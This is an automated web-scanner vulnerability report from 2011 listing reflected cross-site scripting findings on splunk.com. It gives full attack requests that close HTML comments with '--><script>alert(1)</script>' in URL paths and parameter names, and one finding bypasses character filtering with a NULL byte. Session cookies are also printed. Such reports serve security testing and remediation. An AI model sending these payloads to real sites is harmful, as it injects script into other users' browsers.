This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/previous_releases88d0b--><script>alert(1)</script>8b1623a164f HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.439. http://www.splunk.com/page/previous_releases [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/previous_releases
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e3446--><script>alert(1)</script>57678c0f931 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/previous_releases?e3446--><script>alert(1)</script>57678c0f931=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 58901932b283046a182ab6097919c9121296943995 Last-Modified: Sat, 05 Feb 2011 22:13:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 403596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 995dc--><script>alert(1)</script>52186db0835 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page995dc--><script>alert(1)</script>52186db0835/release_rss HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:01 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:01 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:01 GMT; path=/ ETag: c3223f52d0b0feb63946485c5318d8481296943861 Last-Modified: Sat, 05 Feb 2011 22:11:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 7aadb--><script>alert(1)</script>320c10f06c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/release_rss7aadb--><script>alert(1)</script>320c10f06c6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload f0ac2--><script>alert(1)</script>9126f41049b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagef0ac2--><script>alert(1)</script>9126f41049b/road_map_vote HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:47 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:47 GMT; path=/ ETag: e9605f41e84a45812a6eafba56d906191296943907 Last-Modified: Sat, 05 Feb 2011 22:11:47 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1b364--><script>alert(1)</script>f6aac3c258f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/road_map_vote1b364--><script>alert(1)</script>f6aac3c258f HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18238
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.444. http://www.splunk.com/page/road_map_vote [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/road_map_vote
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3cfea--><script>alert(1)</script>a7d560f0de6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/road_map_vote?3cfea--><script>alert(1)</script>a7d560f0de6=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 60e05d87f0138b605f90e52da6396c2d1296943874 Last-Modified: Sat, 05 Feb 2011 22:11:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20645
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 355e5--><script>alert(1)</script>5557b96b483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page355e5--><script>alert(1)</script>5557b96b483/securelink/signup/Splunk_Company_Overview HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 23c1d--><script>alert(1)</script>d5968d369aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelink23c1d--><script>alert(1)</script>d5968d369aa/signup/Splunk_Company_Overview HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:20 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %00db176--><script>alert(1)</script>e09126c71f5 was submitted in the REST URL parameter 4. This input was echoed as db176--><script>alert(1)</script>e09126c71f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_Company_Overview%00db176--><script>alert(1)</script>e09126c71f5 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload bb85d--><script>alert(1)</script>b022b7455e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagebb85d--><script>alert(1)</script>b022b7455e4/securelink/signup/Splunk_Executive_Brief HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload ae00b--><script>alert(1)</script>981d7f94957 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelinkae00b--><script>alert(1)</script>981d7f94957/signup/Splunk_Executive_Brief HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
